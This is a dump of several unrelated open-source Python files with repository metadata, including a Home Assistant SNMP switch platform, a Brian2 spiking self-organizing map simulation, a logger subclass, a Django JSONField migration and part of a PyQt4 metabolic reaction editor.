stefan-jonasson/home-assistant | homeassistant/components/switch/snmp.py | 2 | 4667 | """
Support for SNMP enabled switch.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/switch.snmp/
"""
import logging
import voluptuous as vol
from homeassistant.components.switch import (SwitchDevice, PLATFORM_SCHEMA)
from homeassistant.const import (
CONF_HOST, CONF_NAME, CONF_PORT, CONF_PAYLOAD_ON, CONF_PAYLOAD_OFF)
import homeassistant.helpers.config_validation as cv
REQUIREMENTS = ['pysnmp==4.4.1']
_LOGGER = logging.getLogger(__name__)
CONF_BASEOID = 'baseoid'
CONF_COMMUNITY = 'community'
CONF_VERSION = 'version'
DEFAULT_NAME = 'SNMP Switch'
DEFAULT_HOST = 'localhost'
DEFAULT_PORT = '161'
DEFAULT_COMMUNITY = 'private'
DEFAULT_VERSION = '1'
DEFAULT_PAYLOAD_ON = 1
DEFAULT_PAYLOAD_OFF = 0
SNMP_VERSIONS = {
'1': 0,
'2c': 1
}
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_BASEOID): cv.string,
vol.Optional(CONF_COMMUNITY, default=DEFAULT_COMMUNITY): cv.string,
vol.Optional(CONF_HOST, default=DEFAULT_HOST): cv.string,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_PAYLOAD_OFF, default=DEFAULT_PAYLOAD_OFF): cv.string,
vol.Optional(CONF_PAYLOAD_ON, default=DEFAULT_PAYLOAD_ON): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
vol.Optional(CONF_VERSION, default=DEFAULT_VERSION): vol.In(SNMP_VERSIONS),
})
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Set up the SNMP switch."""
name = config.get(CONF_NAME)
host = config.get(CONF_HOST)
port = config.get(CONF_PORT)
community = config.get(CONF_COMMUNITY)
baseoid = config.get(CONF_BASEOID)
version = config.get(CONF_VERSION)
payload_on = config.get(CONF_PAYLOAD_ON)
payload_off = config.get(CONF_PAYLOAD_OFF)
add_devices(
[SnmpSwitch(name, host, port, community, baseoid, version, payload_on,
payload_off)], True)
class SnmpSwitch(SwitchDevice):
"""Represents a SNMP switch."""
def __init__(self, name, host, port, community,
baseoid, version, payload_on, payload_off):
"""Initialize the switch."""
self._name = name
self._host = host
self._port = port
self._community = community
self._baseoid = baseoid
self._version = SNMP_VERSIONS[version]
self._state = None
self._payload_on = payload_on
self._payload_off = payload_off
def turn_on(self):
"""Turn on the switch."""
from pyasn1.type.univ import (Integer)
self._set(Integer(self._payload_on))
def turn_off(self):
"""Turn off the switch."""
from pyasn1.type.univ import (Integer)
self._set(Integer(self._payload_off))
def update(self):
"""Update the state."""
from pysnmp.hlapi import (
getCmd, CommunityData, SnmpEngine, UdpTransportTarget, ContextData,
ObjectType, ObjectIdentity)
from pyasn1.type.univ import (Integer)
request = getCmd(
SnmpEngine(),
CommunityData(self._community, mpModel=self._version),
UdpTransportTarget((self._host, self._port)),
ContextData(),
ObjectType(ObjectIdentity(self._baseoid))
)
errindication, errstatus, errindex, restable = next(request)
if errindication:
_LOGGER.error("SNMP error: %s", errindication)
elif errstatus:
_LOGGER.error("SNMP error: %s at %s", errstatus.prettyPrint(),
errindex and restable[-1][int(errindex) - 1] or '?')
else:
for resrow in restable:
if resrow[-1] == Integer(self._payload_on):
self._state = True
elif resrow[-1] == Integer(self._payload_off):
self._state = False
else:
self._state = None
@property
def name(self):
"""Return the switch's name."""
return self._name
@property
def is_on(self):
"""Return true if switch is on; False if off. None if unknown."""
return self._state
def _set(self, value):
from pysnmp.hlapi import (
setCmd, CommunityData, SnmpEngine, UdpTransportTarget, ContextData,
ObjectType, ObjectIdentity)
request = setCmd(
SnmpEngine(),
CommunityData(self._community, mpModel=self._version),
UdpTransportTarget((self._host, self._port)),
ContextData(),
ObjectType(ObjectIdentity(self._baseoid), value)
)
next(request)
| mit | 5,310,518,417,148,485,000 | 30.533784 | 79 | 0.620956 | false |
ogvalt/saturn | spiking_som.py | 1 | 18544 |
from brian2 import *
from pyqtgraph.Qt import QtGui, QtCore
import numpy as np
import pyqtgraph as pg
import matplotlib.pyplot as plt
from dataset import ArtificialDataSet
class ReceptiveField:
# Parameter that used in standard deviation definition
gamma = 1.5
def __init__(self, bank_size=10, I_min=0.0, I_max=1.0):
self.bank_size = bank_size
self.field_mu = np.array([(I_min + ((2 * i - 2) / 2) * ((I_max - I_min) / (bank_size - 1)))
for i in range(1, bank_size + 1)])
self.field_sigma = (1.0 / self.gamma) * (I_max - I_min)
def float_to_membrane_potential(self, input_vector):
try:
input_vector = input_vector.reshape((input_vector.shape[0], 1))
except Exception as exc:
print("Exception: {0}\nObject shape: {1}".format(repr(exc), input_vector.shape))
exit(1)
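        # Gaussian tuning curve centred on each neuron's preferred value (field_mu),
        # plus copies shifted by -1 and +1 so inputs near the [0, 1] boundaries are
        # encoded circularly.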
temp = np.exp(-((input_vector - self.field_mu) ** 2) / (2 * self.field_sigma * self.field_sigma)) / \
(np.sqrt(2 * np.pi) * self.field_sigma)
temp += np.exp(-((input_vector - 1 - self.field_mu) ** 2) / (2 * self.field_sigma * self.field_sigma)) / \
(np.sqrt(2 * np.pi) * self.field_sigma)
temp += np.exp(-((input_vector + 1 - self.field_mu) ** 2) / (2 * self.field_sigma * self.field_sigma)) / \
(np.sqrt(2 * np.pi) * self.field_sigma)
return temp
if __name__ == "__main__":
prefs.codegen.target = 'numpy'
np.random.seed(1)
seed(1)
np.set_printoptions(suppress=True)
bank_size = 10
diff_method = 'euler'
# inputs = np.random.rand(3)
# inputs = np.array([0.332, 0.167, 0.946])
# inputs = np.array([0.013, 0.3401, 0.2196])
# inputs = np.array([0.829, 0.7452, 0.6728])
# print(inputs)
# N = inputs.shape[0] * bank_size
N = 20
rf = ReceptiveField(bank_size=bank_size, I_min=0.05, I_max=0.95)
# potential_input = rf.float_to_membrane_potential(inputs)
# potential_input = potential_input.flatten()
# TABLE 1
# (A) Neuronal parameters, used in (1) and (4)
time_step = 0.01;
tau_m = 10.0 * ms;
tau_m_inh = 5 * ms;
tau_m_som = 3 * ms
theta_reset_u = -0.5;
theta_reset_inh = -0.0;
theta_reset_som = 0.0
theta_u = 0.5;
theta_u_inh = 0.01;
theta_som = 0.8
# (B) Synaptic parameters, used in (2) and (3) for different synapse types
# temporal layer to som layer (u to v)
tau_r_afferent = 0.2 * ms;
tau_f_afferent = 1.0 * ms
# temporal layer (u to inh exc, u to inh inh, inh to u)
tau_r_exc = 0.4 * ms;
tau_f_exc = 2.0 * ms;
tau_r_inh = 0.2 * ms;
tau_f_inh = 1.0 * ms
tau_r_inh2u = 1.0 * ms;
tau_f_inh2u = 5.0 * ms
# som layer
tau_r_lateral = 0.1 * ms;
tau_f_lateral = 0.5 * ms
# (C) Maximum magnitudes of synaptic connection strength
w_syn_temporal_to_som_max = 2.2;
w_syn_u2inh_exc_max = 1.0;
w_syn_u2inh_inh_max = 1.0;
w_syn_inh2u_max = 100.0
w_syn_som_to_som_max = 1.0
# (D) Neighbourhood parameters, used in (6) and (7), for layer v (som)
a = 3.0;
b = 3.0;
X = 3.0;
X_ = 3.0
# (E) Learning parameter, used in (5)
# A_plus - Max synaptic strength, A_minus - max synaptic weakness; tau_plus, tau_minus - time constant of STDP
A_plus = 0.0016;
A_minus = 0.0055;
tau_plus = 11;
tau_minus = 10
# used in (7)
T = 10.0;
power_n = 2.0
# used in (6)
pi = np.pi
# size of the self-organizing map
map_size = 10
temporal_layer_neuron_equ = '''
dtime/dt = 1 / ms : 1
# inhibition connection to u layer
ds_inh2u/dt = (-s_inh2u)/tau_r_inh2u: 1
dw_inh2u/dt = (s_inh2u - w_inh2u)/tau_f_inh2u: 1
# membrane potential of u layer
dv/dt = (-v + I_ext - w_inh2u) / tau_m: 1
I_ext : 1
'''
inhibition_neuron_equ = '''
dtime/dt = 1 / ms : 1
# inhibition connection
# s_inh - internal variable
# w_inh - output potential
ds_inh/dt = (-s_inh)/tau_r_inh: 1
dw_inh/dt = (s_inh - w_inh)/tau_f_inh: 1
# excitation connection
# s_exc - internal variable
# w_exc - output potential
ds_exc/dt = (-s_exc)/tau_r_exc: 1
dw_exc/dt = (s_exc - w_exc)/tau_f_exc: 1
# diff equation membrane potential of inhibition neuron
dv/dt = (-v + w_exc - w_inh) / tau_m_inh: 1
'''
som_layer_neuron_equ = '''
dglobal_time/dt = 1 / ms : 1
dtime/dt = 1 / ms : 1
# Afferent connection (from temporal layer to som layer)
ds_afferent/dt = (-s_afferent)/tau_r_afferent: 1
dw_afferent/dt = (s_afferent - w_afferent)/tau_f_afferent: 1
# lateral connection
ds_lateral/dt = (-s_lateral)/tau_r_lateral: 1
dw_lateral/dt = (s_lateral - w_lateral)/tau_f_lateral: 1
# membrane potential of u layer
dv/dt = (-v + w_lateral + w_afferent) / tau_m_som: 1
'''
temporal_layer = NeuronGroup(N, temporal_layer_neuron_equ, threshold='v>theta_u', method=diff_method,
reset='''v = theta_reset_u; time = 0''')
# temporal_layer.I_ext = potential_input
# inhibition neuron
inhibition_neuron = NeuronGroup(1, inhibition_neuron_equ, threshold='v>theta_u_inh', method=diff_method,
reset='''v = theta_reset_inh; time = 0''')
# self-organizing layer
som_layer = NeuronGroup(map_size * map_size, som_layer_neuron_equ, threshold='v>theta_som', method=diff_method,
reset='''v = theta_reset_som; time = 0''')
# v to inh neuron, excitation connection
u2inh_excitation = Synapses(temporal_layer, target=inhibition_neuron, method=diff_method,
on_pre='''
s_exc += w_syn
A_pre = (- w_syn) * A_minus * (1 - 1/tau_minus) ** time_post
w_syn = clip(w_syn + plasticity * A_pre, 0, w_syn_u2inh_exc_max)
''',
on_post='''
A_post = exp(-w_syn) * A_plus * (1 - 1/tau_plus) ** time_pre
w_syn = clip(w_syn + plasticity * A_post, 0, w_syn_u2inh_exc_max)
''',
model='''
w_syn : 1 # synaptic weight / synapse efficacy
plasticity : boolean (shared)
''')
u2inh_excitation.connect(i=np.arange(N), j=0)
u2inh_excitation.w_syn = 'rand() * w_syn_u2inh_exc_max'
# v to inh neuron, inhibition connection
u2inh_inhibition = Synapses(temporal_layer, target=inhibition_neuron, method=diff_method,
on_pre='''
s_inh += w_syn
A_pre = (- w_syn) * A_minus * (1 - 1/tau_minus) * time_post
w_syn = clip(w_syn + plasticity * A_pre, 0, w_syn_u2inh_inh_max)
''',
on_post='''
A_post = exp(-w_syn) * A_plus * (1 - 1/tau_plus) * time_pre
w_syn = clip(w_syn + plasticity * A_post, 0, w_syn_u2inh_inh_max)
''',
model='''
w_syn : 1 # synaptic weight / synapse efficacy
plasticity : boolean (shared)
''')
u2inh_inhibition.connect(i=np.arange(N), j=0)
u2inh_inhibition.w_syn = 'rand() * w_syn_u2inh_inh_max'
# inh neuron to v, inhibition connection
inh2u_inhibition = Synapses(inhibition_neuron, target=temporal_layer, method=diff_method,
on_pre='''
s_inh2u += w_syn
A_pre = (- w_syn) * A_minus * (1 - 1/tau_minus) * time_post
w_syn = clip(w_syn + plasticity * A_pre, 0, w_syn_inh2u_max)
''',
on_post='''
A_post = exp(-w_syn) * A_plus * (1 - 1/tau_plus) * time_pre
w_syn = clip(w_syn + plasticity * A_post, 0, w_syn_inh2u_max)
''',
model='''
w_syn : 1 # synaptic weight / synapse efficacy
plasticity : boolean (shared)
''')
inh2u_inhibition.connect(i=0, j=np.arange(N))
# inh2u_inhibition.w_syn = 'rand() * w_syn_inh2u_max'
inh2u_inhibition.w_syn = 0.5 * w_syn_inh2u_max
# som lateral connection
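    # Lateral weights follow the neighbourhood function of (6) and (7): the radius
    # shrinks with global_time, pre/post grid coordinates are recovered from the
    # flat neuron index, and the weight is a sum of two Gaussians of the grid distance.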
som_synapse = Synapses(som_layer, target=som_layer, method=diff_method,
on_pre='''
radius = X - (X - X_)/(1+(2**0.5 - 1)*((global_time/T)**(2 * power_n)))
y_pre = floor(i / map_size)
x_pre = i - y_pre * map_size
y_post = floor(j/map_size)
x_post = j - y_post * map_size
dist = (x_post - x_pre)**2 + (y_post - y_pre)**2
G1 = (1 + a) * exp(- dist/(radius**2)) / (2 * pi * radius**2)
G2 = a * exp(- dist/(b * radius)**2) / (2 * pi * (b * radius)**2)
w_syn = clip(G1 + G2, 0, w_syn_som_to_som_max)
s_lateral += w_syn
''',
on_post='''
''',
model='''
w_syn : 1 # synaptic weight / synapse efficacy
''')
som_synapse.connect(condition='i!=j')
# som afferent connection
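    # Plastic afferent weights (STDP, eq. (5)): presynaptic spikes depress via A_minus,
    # postsynaptic spikes potentiate via A_plus, clipped to [0, w_syn_temporal_to_som_max].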
temporal_to_som_synapse = Synapses(temporal_layer, target=som_layer, method=diff_method,
on_pre='''
s_afferent += w_syn
A_pre = (- w_syn) * A_minus * (1 - 1/tau_minus) ** time_post
w_syn = clip(w_syn + plasticity * A_pre, 0, w_syn_temporal_to_som_max)
''',
on_post='''
A_post = exp(-w_syn) * A_plus * (1 - 1/tau_plus) * time_pre
w_syn = clip(w_syn + plasticity * A_post, 0, w_syn_temporal_to_som_max)
''',
model='''
w_syn : 1 # synaptic weight / synapse efficacy
plasticity : boolean (shared)
''')
temporal_to_som_synapse.connect()
temporal_to_som_synapse.w_syn = np.random.randint(low=40000, high=60000, size=N*map_size*map_size) \
* w_syn_temporal_to_som_max / 100000.0
# Visualization
som_spike_mon = SpikeMonitor(som_layer)
u_spike_mon = SpikeMonitor(temporal_layer)
# u_state_mon_v = StateMonitor(temporal_layer, 'v', record=True)
# u_state_mon_time = StateMonitor(temporal_layer, 'time', record=True)
# u_state_mon_w = StateMonitor(temporal_layer, 'w_inh2u', record=True)
inh_spike_mon = SpikeMonitor(inhibition_neuron)
# inh_state_mon = StateMonitor(inhibition_neuron, 'v', record=True)
# w_exc_neu_state = StateMonitor(inhibition_neuron, 'w_exc', record=True)
# w_inh_neu_state = StateMonitor(inhibition_neuron, 'w_inh', record=True)
#
# w_syn_u2inh_exc = StateMonitor(u2inh_excitation, 'w_syn', record=True)
defaultclock.dt = time_step * ms
step = 2
plasticity_state = False
u2inh_excitation.plasticity = plasticity_state
u2inh_inhibition.plasticity = plasticity_state
inh2u_inhibition.plasticity = plasticity_state
temporal_to_som_synapse.plasticity = True # plasticity_state
# simulation_time = 200
# run(simulation_time * ms, report='text')
# weight visualization
# simulation
simulation_time = 50
attempts = 5
dataset = ArtificialDataSet(500, int(N/10))
dataset = dataset.generate_set()
np.savetxt('dataset.txt', dataset, delimiter=';')
plt.scatter(dataset[:, 0], dataset[:, 1], s=5)
plt.show()
net_model = Network(collect())
net_model.store()
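    # Training loop: each input vector is presented several times; every attempt
    # restores the last stored network state, runs the simulation, then stores it
    # again so the learned weights carry over.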
for vector in dataset:
for it in range(attempts):
net_model.restore()
print("Input vector: {0}, attempt: {1}".format(vector, it))
potential_input = rf.float_to_membrane_potential(vector)
potential_input = potential_input.flatten()
temporal_layer.I_ext = potential_input
net_model.run(simulation_time * ms, report='text')
net_model.store()
# visual
app = QtGui.QApplication([])
win = pg.GraphicsWindow(title="som")
win.resize(1000, 600)
win.setWindowTitle('brain')
# Enable antialiasing for prettier plots
pg.setConfigOptions(antialias=True)
p1 = win.addPlot(title="Region Selection")
p1.plot(u_spike_mon.t / ms, u_spike_mon.i[:], pen=None, symbol='o',
symbolPen=None, symbolSize=5, symbolBrush=(255, 255, 255, 255))
p1.showGrid(x=True, y=True)
lr = pg.LinearRegionItem([0, simulation_time])
lr.setZValue(0)
p1.addItem(lr)
p2 = win.addPlot(title="Zoom on selected region")
p2.plot(u_spike_mon.t / ms, u_spike_mon.i[:], pen=None, symbol='o',
symbolPen=None, symbolSize=5, symbolBrush=(255, 255, 255, 255))
p2.showGrid(x=True, y=True)
def updatePlot():
p2.setXRange(*lr.getRegion(), padding=0)
def updateRegion():
lr.setRegion(p2.getViewBox().viewRange()[0])
lr.sigRegionChanged.connect(updatePlot)
p2.sigXRangeChanged.connect(updateRegion)
updatePlot()
win.nextRow()
p3 = win.addPlot(title="Region Selection")
p3.plot(som_spike_mon.t / ms, som_spike_mon.i[:], pen=None, symbol='o',
symbolPen=None, symbolSize=5, symbolBrush=(255, 255, 255, 255))
p3.showGrid(x=True, y=True)
lr1 = pg.LinearRegionItem([0, 10])
lr1.setZValue(0)
p3.addItem(lr1)
p4 = win.addPlot(title="Zoom on selected region")
p4.plot(som_spike_mon.t / ms, som_spike_mon.i[:], pen=None, symbol='o',
symbolPen=None, symbolSize=5, symbolBrush=(255, 255, 255, 255))
p4.showGrid(x=True, y=True)
def updatePlot2():
p4.setXRange(*lr1.getRegion(), padding=0)
def updateRegion2():
lr1.setRegion(p4.getViewBox().viewRange()[0])
lr1.sigRegionChanged.connect(updatePlot2)
p4.sigXRangeChanged.connect(updateRegion2)
updatePlot2()
u2som_syn_shape = temporal_to_som_synapse.w_syn[:].shape
picture = temporal_to_som_synapse.w_syn[:].reshape(N, int(u2som_syn_shape[0] / N))
np.savetxt('weights.txt', picture, delimiter=';')
win2 = QtGui.QMainWindow()
win2.resize(800, 800)
imv = pg.ImageView()
win2.setCentralWidget(imv)
win2.show()
win2.setWindowTitle("SOM weights")
imv.setImage(picture)
# subplot(421)
# # subplot(111)
# title("Temporal layer spikes")
# plot(u_spike_mon.t / ms, u_spike_mon.i, '.k')
# xlabel('Time (ms)')
# ylabel('Neuron index')
# grid(True)
# xticks(np.arange(0.0, simulation_time + step, step))
# yticks(np.arange(-1, N + 1, 1))
#
# # show()
#
# subplot(422)
# title("Inhibition neuron spikes")
# plot(inh_spike_mon.t / ms, inh_spike_mon.i, '.k')
# xlabel('Time (ms)')
# ylabel('Neuron index')
# grid(True)
# xticks(np.arange(0.0, simulation_time + step, step))
# yticks(np.arange(-1, 1, 1))
#
# subplot(423)
# title("u membrane potential")
# for item in u_state_mon_v:
# plot(u_state_mon_v.t / ms, item.v)
# # plot(u_state_mon_v.t / ms, u_state_mon_v[0].v)
# xlabel('Time (ms)')
# ylabel('Potential')
# xticks(np.arange(0.0, simulation_time + step, step))
#
# subplot(424)
# title("Inhibition neuron membrane potential")
# plot(inh_state_mon.t / ms, inh_state_mon[0].v)
# xlabel('Time (ms)')
# ylabel('Potential')
# xticks(np.arange(0.0, simulation_time + step, step))
#
# subplot(425)
# title("Excitation/inhibition interaction")
# plot(w_exc_neu_state.t / ms, w_exc_neu_state[0].w_exc, w_exc_neu_state.t / ms, w_inh_neu_state[0].w_inh,
# w_exc_neu_state.t / ms, w_exc_neu_state[0].w_exc - w_inh_neu_state[0].w_inh)
# xlabel('Time (ms)')
# ylabel('Potential')
# xticks(np.arange(0.0, simulation_time + step, step))
#
# subplot(426)
# title("Inhibition to u potential")
# plot(u_state_mon_w.t / ms, u_state_mon_w[0].w_inh2u)
# xlabel('Time (ms)')
# ylabel('Potential')
# xticks(np.arange(0.0, simulation_time + step, step))
#
# subplot(427)
# title("Synaptic Weight")
# for item in w_syn_u2inh_exc:
# plot(w_syn_u2inh_exc.t / ms, item.w_syn)
# xlabel('Time (ms)')
# ylabel('Potential')
# xticks(np.arange(0.0, simulation_time + step, step))
# yticks(np.arange(-0.1, 1.1, 0.1))
#
# subplot(428)
# title("Synaptic time pre spike")
# for item in u_state_mon_time:
# plot(w_syn_u2inh_exc.t / ms, item.time)
# xlabel('Time (ms)')
# ylabel('Potential')
# xticks(np.arange(0.0, simulation_time + step, step))
#
# show()
#
# # subplot(111)
# title("Som layer spikes")
# plot(som_spike_mon.t / ms, som_spike_mon.i, '.k')
# xlabel('Time (ms)')
# ylabel('Neuron index')
# grid(True)
# xticks(np.arange(0.0, simulation_time + step, step))
# yticks(np.arange(-1, map_size * map_size + 1, 1))
#
# show()
if __name__ == '__main__':
import sys
if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
QtGui.QApplication.instance().exec_()
| mit | 4,091,960,593,132,690,000 | 38.04 | 115 | 0.512942 | false |
alexrudy/Cauldron | Cauldron/logger.py | 1 | 1395 | # -*- coding: utf-8 -*-
"""
A useful subclass of logger for more fine-grained messaging.
"""
import logging
import weakref
__all__ = ['KeywordMessageFilter']
class Logger(logging.getLoggerClass()):
"""A basic subclass of logger with some useful items."""
def getChild(self, suffix):
"""Get a child logger."""
return logging.getLogger("{0}.{1}".format(self.name, suffix))
def msg(self, msg, *args, **kwargs):
"""Messaging-level logging."""
if self.isEnabledFor(5):
self._log(5, msg, args, **kwargs)
def trace(self, msg, *args, **kwargs):
"""Trace-level logging."""
if self.isEnabledFor(1):
self._log(1, msg, args, **kwargs)
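# Register this subclass as the default, so logging.getLogger() returns Logger
# instances for any logger created after this point.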
logging.setLoggerClass(Logger)
class KeywordMessageFilter(logging.Filter):
def __init__(self, keyword):
"""Filter using a keyword."""
logging.Filter.__init__(self)
self._keyword_name = keyword.full_name
self._keyword = weakref.ref(keyword)
def filter(self, record):
"""Filter by applying keyword names."""
record.keyword_name = self._keyword_name
keyword = self._keyword()
if keyword is not None:
record.keyword = repr(keyword)
else:
record.keyword = "<MissingKeyword '{0}'>".format(self._keyword_name)
return True
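# Typical use: attach the filter to a handler or logger so its records gain
# 'keyword_name' and 'keyword' attributes, e.g.
#   handler.addFilter(KeywordMessageFilter(keyword))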
| bsd-3-clause | -8,061,825,739,172,878,000 | 26.92 | 80 | 0.581362 | false |
sprtkd/OpenHmnD | object/tst.py | 1 | 3754 | # -*- coding: utf-8 -*-
"""
Created on Tue Jul 11 09:29:01 2017
@author: Punyajoy Saha
"""
#!/usr/bin/env python
from pocketsphinx.pocketsphinx import *
from sphinxbase.sphinxbase import *
#
#import speech2
#
## say() speaks out loud.
#speech2.say("I am speaking out loud.")
#
## input() waits for user input. The prompt text is optional.
##spoken_text = speech2.input("Say something, user!")
##print ("You said: %s" % spoken_text)
#
## You can limit user input to a set of phrases.
#spoken_text = speech2.input("Are you there, user?", ["Yes", "No", "Shut up, computer."])
#print ("You said: %s" % spoken_text)
#
## If you don't want to wait for input, you can use listenfor() to run a callback
## every time a specific phrase is heard. Meanwhile your program can move on to other tasks.
#def L1callback(phrase, listener):
# print ("Heard the phrase: %s" % phrase)
## listenfor() returns a Listener object with islistening() and stoplistening() methods.
#listener1 = speech2.listenfor(["any of", "these will", "match"], L1callback)
#
## You can listen for multiple things at once, doing different things for each.
#def L2callback(phrase, listener):
# print ("Another phrase: %s" % phrase)
#listener2 = speech2.listenfor(["good morning Michael"], L2callback)
#
## If you don't have a specific set of phrases in mind, listenforanything() will
## run a callback every time anything is heard that doesn't match another Listener.
#def L3callback(phrase, listener):
# speech2.say(phrase) # repeat it back
# if phrase == "stop now please":
# # The listener returned by listenfor() and listenforanything()
# # is also passed to the callback.
# listener.stoplistening()
#listener3 = speech2.listenforanything(L3callback)
#
## All callbacks get automatically executed on a single separate thread.
## Meanwhile, you can just do whatever with your program, or sleep.
## As long as your main program is running code, Listeners will keep listening.
#
#import time
#while listener3.islistening(): # till "stop now please" is heard
# time.sleep(1)
#
#assert speech2.islistening() # to at least one thing
#print ("Dictation is now stopped. listeners 1 and 2 are still going.")
#
#listener1.stoplistening()
#print ("Now only listener 2 is going")
#
## Listen with listener2 for a while more, then turn it off.
#time.sleep(30)
#
#speech2.stoplistening() # stop all remaining listeners
#assert not speech2.islistening()
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#print ('item {\n'+' name: "my"'+' name: "my"')
#print (' name: "my"')
#print (' name: "my"')
#print ('}')
#
#import cv2
#import numpy as np
#import random
#roi=cv2.imread('img2.png')
#hsv_roi = cv2.cvtColor(roi, cv2.COLOR_BGR2HSV)
#cv2.imwrite('imghsv.png',hsv_roi)
#x_max=hsv_roi.shape[0]
#y_max=hsv_roi.shape[1]
#y_10=int(y_max/20)
#x_10=int(x_max/20)
#a=np.zeros((5,3),dtype='uint8')
#x=random.sample(range(int(x_max/2-20),int(x_max/2+20)),5)
#y=random.sample(range(int(y_max/2-10),int(y_max/2+10)),5)
#
#for i in range(0,a.shape[0]):
# a[i,0]=hsv_roi[int(x[i]),int(y[i]),0]
# a[i,1]=hsv_roi[int(x[i]),int(y[i]),1]
# a[i,2]=hsv_roi[int(x[i]),int(y[i]),2]
#max_0=np.max(a[:,0])
#max_1=np.max(a[:,1])
#max_2=np.max(a[:,2])
#min_0=np.min(a[:,0])
#min_1=np.min(a[:,1])
#min_2=np.min(a[:,2])
#
#
#mask = cv2.inRange(hsv_roi, np.array((min_0, min_1,min_2)), np.array((max_0,max_1,max_2)))
#cv2.imwrite('mask.png',mask)
#roi_hist = cv2.calcHist([hsv_roi],[0],mask,[180],[0,180])
#cv2.normalize(roi_hist,roi_hist,0,255,cv2.NORM_MINMAX)
#term_crit = ( cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 1 )
| mit | 6,885,824,817,186,783,000 | 23.889655 | 93 | 0.641982 | false |
jrief/djangocms-cascade | cmsplugin_cascade/migrations/0029_json_field.py | 1 | 2323 | # Generated by Django 3.1.5 on 2021-01-28 15:52
from django.db import migrations, models
def backwards(apps, schema_editor):
print("Migration backward will not restore your `JSONField`s to `CharField`s.")
class Migration(migrations.Migration):
dependencies = [
('cmsplugin_cascade', '0028_cascade_clipboard'),
]
operations = [
migrations.AlterField(
model_name='cascadeelement',
name='glossary',
field=models.JSONField(blank=True, default=dict),
),
migrations.AlterField(
model_name='cascadeclipboard',
name='data',
field=models.JSONField(blank=True, default=dict, null=True),
),
migrations.AlterField(
model_name='cascadepage',
name='glossary',
field=models.JSONField(blank=True, default=dict, help_text='Store for arbitrary page data.'),
),
migrations.AlterField(
model_name='cascadepage',
name='settings',
field=models.JSONField(blank=True, default=dict, help_text='User editable settings for this page.'),
),
migrations.AlterField(
model_name='iconfont',
name='config_data',
field=models.JSONField(),
),
migrations.AlterField(
model_name='inlinecascadeelement',
name='glossary',
field=models.JSONField(blank=True, default=dict),
),
migrations.AlterField(
model_name='pluginextrafields',
name='css_classes',
field=models.JSONField(blank=True, default=dict, null=True),
),
migrations.AlterField(
model_name='pluginextrafields',
name='inline_styles',
field=models.JSONField(blank=True, default=dict, null=True),
),
migrations.AlterField(
model_name='sharedglossary',
name='glossary',
field=models.JSONField(blank=True, default=dict, null=True),
),
migrations.AlterField(
model_name='sortableinlinecascadeelement',
name='glossary',
field=models.JSONField(blank=True, default=dict),
),
migrations.RunPython(migrations.RunPython.noop, reverse_code=backwards),
]
| mit | -3,055,507,169,678,262,000 | 33.161765 | 112 | 0.587602 | false |
SystemsBioinformatics/cbmpy | cbmpy/CBQt4.py | 1 | 32405 | """
CBMPy: CBQt4 module
===================
Constraint Based Modelling in Python (http://pysces.sourceforge.net/getNewReaction)
Copyright (C) 2009-2018 Brett G. Olivier, VU University Amsterdam, Amsterdam, The Netherlands
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>
Author: Brett G. Olivier
Contact email: [email protected]
Last edit: $Author: bgoli $ ($Id: CBQt4.py 710 2020-04-27 14:22:34Z bgoli $)
"""
# preparing for Python 3 port
from __future__ import division, print_function
from __future__ import absolute_import
#from __future__ import unicode_literals
import os
import time
import random
import math
import re
import webbrowser
import urllib2
from .CBCommon import pp_chemicalFormula
from .CBModel import Reaction as CBMReaction
HAVE_QT4 = False
try:
import PyQt4
from PyQt4 import QtCore, QtGui, QtSvg
from PyQt4.QtWebKit import QGraphicsWebView
HAVE_QT4 = True
print('Qt4 GUI tools available')
except ImportError as ex:
print('\nQt4 GUI tools not available.')
print(ex)
class ReactionCreator(QtGui.QWidget):
#_fba = None
_mlist = None
_rlist = None
_flist = None
_newSubs = None
_newProds = None
_fixColour = None
_errColour = None
_goodColour = None
_cfdict = None
_cndict = None
_ccdict = None
IGNORECHECK = False
ISBALANCED = True
NewReaction = None
_Blower = '-inf'
_Bupper = 'inf'
def __init__(self, rlist, mlist, flist, cfdict, cndict, ccdict):
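        # rlist/mlist/flist: existing reaction, species and boundary-species ids;
        # cfdict/cndict/ccdict: chemical formula, name and compartment per species id.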
super(ReactionCreator, self).__init__()
self.mousePos = self.cursor().pos()
rlist.sort()
mlist.sort()
flist.sort()
self._rlist = rlist
self._mlist = mlist
self._flist = flist
self._cfdict = cfdict
self._cndict = cndict
self._ccdict = ccdict
self._newSubs = []
self._newProds = []
self._fixColour = QtGui.QColor(0, 0, 153, alpha=255)
self._errColour = QtGui.QColor(255, 0, 0, alpha=255)
self._goodColour = QtGui.QColor(0, 100, 0, alpha=255)
self.initUI()
def addSubstrate(self, coeff, sid):
self.tblSub.insertRow(self.tblSubRow)
self.tblSub.setItem(self.tblSubRow, 0, QtGui.QTableWidgetItem('{}'.format(coeff)))
self.tblSub.setItem(self.tblSubRow, 1, QtGui.QTableWidgetItem('{}'.format(sid)))
CF = 'None'
if sid in self._cfdict:
CF = self._cfdict[sid]
self.tblSub.item(self.tblSubRow, 1).setToolTip(CF)
if sid in self._flist:
self.tblSub.item(self.tblSubRow, 1).setForeground(self._fixColour)
self.tblSub.item(self.tblSubRow, 0).setTextAlignment(QtCore.Qt.AlignCenter)
self.tblSubRow += 1
def addSelectedSubstrates(self):
self.IGNORECHECK = True
items = [str(it_.text()) for it_ in self.lstSub.selectedItems()]
self.setFocus(PyQt4.QtCore.Qt.OtherFocusReason)
# print(items)
for i_ in items:
if i_ not in self._newSubs:
self.addSubstrate(1, i_)
self._newSubs.append(i_)
self.IGNORECHECK = False
self.statusBar.showMessage('Substrates(s) added')
self.checkBalance()
